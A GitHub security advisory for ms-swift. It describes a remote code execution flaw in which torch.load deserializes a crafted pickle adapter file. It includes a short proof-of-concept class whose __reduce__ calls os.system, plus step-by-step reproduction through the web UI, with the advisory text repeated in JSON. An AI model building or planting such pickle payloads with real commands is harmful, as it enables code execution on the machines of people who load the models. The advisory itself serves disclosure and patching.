GHSA-R54C-2XMF-2CF3
Vulnerability from github – Published: 2025-07-31 14:05 – Updated: 2025-07-31 14:06This appears to be a security vulnerability report describing a remote code execution (RCE) exploit in the ms-swift framework through malicious pickle deserialization in adapter model files. The vulnerability allows arbitrary command execution when loading specially crafted adapter models from ModelScope.
This occurs when using machine torch version < 2.6.0, while ms-swift accepts torch version >= 2.0
I. Detailed Description: 1. Install ms-swift
pip install ms-swift -U
- Start web-ui
swift web-ui --lang en
-
After startup, you can access http://localhost:7860/ through your browser to see the launched fine-tuning framework program
-
Upload an adapter model repository (cyjhhh/lora_adapter_4_llama3) on ModelScope, where the lora/adapter_model.bin file is generated through the following code:
import torch, pickle, os
class MaliciousPayload:
def __reduce__(self):
return (os.system, ("touch /tmp/malicious.txt",)) # Arbitrary command
malicious_data = {
"v_head.summary.weight": MaliciousPayload(),
"v_head.summary.bias": torch.randn(10)
}
if __name__ == "__main__":
with open("adapter_model.bin", "wb") as f:
pickle.dump(malicious_data, f)
-
First training submission: First, fill in the required parameters in the LLM Training interface, including Model id and Dataset Code, and configure the following in the Other params section of Advanced settings
-
Click Begin to submit. You can see the backend command running as follows
-
By reading the ms-swift source code, swift.llm.model.utils#safe_snapshot_download() and modelscope.hub.utils.utils#get_cache_dir(), we can see that adapters are downloaded locally to the path ~/.cache/modelscope. Therefore, the complete local path for the specified remote adapters after download is:
~/.cache/modelscope/hub/models/cyjhhh/lora_adapter_4_llama3
Wait for the first submission program until the adapters download is complete, then you can click "kill running task" on the page to terminate the first training
- Second training submission, configure the page parameters as follows
Click submit to see the backend command running as follows
-
After waiting for a while, you can see that torch.load() loaded the malicious adapter_model.bin file and successfully executed the command. Related execution information can also be seen in the log file corresponding to --logging_dir
-
Note (Prerequisites) Requires machine torch version < 2.6.0, while ms-swift accepts torch version >= 2.0
II. Vulnerability Proof: 1. Remote downloaded adapter malicious model: [lora_adapter_4_llama3](https://www.modelscope.cn/models/cyjhhh/lora_adapter_4_llama3/files) 2. For the second training submission, it's recommended to follow the parameters shown in the screenshots above for reproduction, as it will validate the target modules specified in the base model and adapter config. If they don't match, the program will terminate early. It's also recommended to select the same dataset content as shown in the screenshots 3. This report only reproduces RCE for one entry point (single path). In reality, there are more than one path in the code that can cause deserialization RCE
III. Fix Solution:
SWIFT has disabled torch.load operations from 3.7 or later.
Author
- Discovered by: TencentAISec
- Contact: security@tencent.com
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "ms-swift"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "3.6.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-07-31T14:05:13Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "This appears to be a security vulnerability report describing a remote code execution (RCE) exploit in the ms-swift framework through malicious pickle deserialization in adapter model files. The vulnerability allows arbitrary command execution when loading specially crafted adapter models from ModelScope.\n\nThis occurs when using machine torch version \u003c 2.6.0, while ms-swift accepts torch version \u003e= 2.0\n\n**I. Detailed Description:**\n1. Install ms-swift\n```\npip install ms-swift -U\n```\n\n2. Start web-ui\n```\nswift web-ui --lang en\n```\n\n3. After startup, you can access [http://localhost:7860/](http://localhost:7860/) through your browser to see the launched fine-tuning framework program\n\n4. Upload an adapter model repository (cyjhhh/lora_adapter_4_llama3) on ModelScope, where the lora/adapter_model.bin file is generated through the following code:\n```python\nimport torch, pickle, os\n\nclass MaliciousPayload:\n def __reduce__(self):\n return (os.system, (\"touch /tmp/malicious.txt\",)) # Arbitrary command\n\nmalicious_data = {\n \"v_head.summary.weight\": MaliciousPayload(),\n \"v_head.summary.bias\": torch.randn(10)\n}\n\nif __name__ == \"__main__\":\n with open(\"adapter_model.bin\", \"wb\") as f:\n pickle.dump(malicious_data, f)\n```\n\n5. First training submission: First, fill in the required parameters in the LLM Training interface, including Model id and Dataset Code, and configure the following in the Other params section of Advanced settings\n\n6. Click Begin to submit. You can see the backend command running as follows\n\n7. By reading the ms-swift source code, swift.llm.model.utils#safe_snapshot_download() and modelscope.hub.utils.utils#get_cache_dir(), we can see that adapters are downloaded locally to the path ~/.cache/modelscope. Therefore, the complete local path for the specified remote adapters after download is:\n```\n~/.cache/modelscope/hub/models/cyjhhh/lora_adapter_4_llama3\n```\nWait for the first submission program until the adapters download is complete, then you can click \"kill running task\" on the page to terminate the first training\n\n8. Second training submission, configure the page parameters as follows\n\nClick submit to see the backend command running as follows\n\n9. After waiting for a while, you can see that torch.load() loaded the malicious adapter_model.bin file and successfully executed the command. Related execution information can also be seen in the log file corresponding to --logging_dir\n\n10. Note (Prerequisites)\nRequires machine torch version \u003c 2.6.0, while ms-swift accepts torch version \u003e= 2.0\n\n**II. Vulnerability Proof:**\n1. Remote downloaded adapter malicious model: [[lora_adapter_4_llama3](https://www.modelscope.cn/models/cyjhhh/lora_adapter_4_llama3/files)](https://www.modelscope.cn/models/cyjhhh/lora_adapter_4_llama3/files)\n2. For the second training submission, it\u0027s recommended to follow the parameters shown in the screenshots above for reproduction, as it will validate the target modules specified in the base model and adapter config. If they don\u0027t match, the program will terminate early. It\u0027s also recommended to select the same dataset content as shown in the screenshots\n3. This report only reproduces RCE for one entry point (single path). In reality, there are more than one path in the code that can cause deserialization RCE\n\n**III. Fix Solution:**\n```\nSWIFT has disabled torch.load operations from 3.7 or later.\n```\n\n## Author\n\n* Discovered by: [TencentAISec](https://github.com/TencentAISec)\n* Contact: *[security@tencent.com](mailto:security@tencent.com)*",
"id": "GHSA-r54c-2xmf-2cf3",
"modified": "2025-07-31T14:06:13Z",
"published": "2025-07-31T14:05:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/modelscope/ms-swift/security/advisories/GHSA-r54c-2xmf-2cf3"
},
{
"type": "WEB",
"url": "https://github.com/modelscope/ms-swift/commit/cc47463bcd25a8720437cf945130f43052eec5e4"
},
{
"type": "PACKAGE",
"url": "https://github.com/modelscope/ms-swift"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "MS SWIFT Deserialization RCE Vulnerability"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.